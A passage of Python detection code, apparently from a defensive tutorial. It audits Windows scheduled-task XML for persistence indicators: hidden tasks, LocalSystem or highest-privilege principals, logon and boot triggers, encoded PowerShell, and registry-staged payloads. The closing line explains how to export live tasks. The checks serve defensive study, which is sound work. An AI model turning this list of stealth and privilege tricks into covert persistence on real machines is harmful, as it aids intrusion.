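    return base64.b64decode(b64).decode("utf-16-le")


def audit_task_xml(xml_text: str) -> List[str]:
    root = ET.fromstring(xml_text)
    findings: List[str] = []
    if (_text(root, "t:Settings/t:Hidden") or "").lower() == "true":
        findings.append("hidden from the Task Scheduler UI (Settings/Hidden=true)")
    for principal in root.findall("t:Principals/t:Principal", NS):
        who = _text(principal, "t:UserId") or _text(principal, "t:GroupId") or "?"
        if who.upper() in ("S-1-5-18", "SYSTEM", "NT AUTHORITY\\SYSTEM"):
            findings.append(f"runs as LocalSystem ({who})")
        if _text(principal, "t:RunLevel") == "HighestAvailable":
            findings.append("requests highest available privileges")
    for trigger in root.findall("t:Triggers/*", NS):
        kind = trigger.tag.rsplit("}", 1)[-1]  # strip the namespace
        if kind in ("LogonTrigger", "BootTrigger"):
            findings.append(f"trigger: {kind}")
    for action in root.findall("t:Actions/t:Exec", NS):
        cmdline = f"{_text(action, 't:Command') or ''} {_text(action, 't:Arguments') or ''}"
        m = ENCODED_CMD.search(cmdline)
        if m:
            findings.append(f"encoded PowerShell decodes to: {decode_encoded_command(m.group(1))}")
        if STAGED_PAYLOAD.search(cmdline):
            findings.append("action decodes a payload staged in the registry")
    return findings


if __name__ == "__main__":
    for label, xml_text in (("registry-staged", make_task_xml(REGISTRY_STAGED_ARGS)),
                            ("encoded", make_task_xml(ENCODED_ARGS, hidden=False, user_id="S-1-5-21-1-2-3-1001"))):
        print(label)
        for finding in audit_task_xml(xml_text):
            print("  -", finding)
```

To audit live tasks, export them with `schtasks /Query /XML ONE` (or read C:\Windows\System32\Tasks\*, which stores the same XML) and pass each definition to audit_task_xml; the Hidden flag set by test #8 is invisible in the UI but plainly present in the XML.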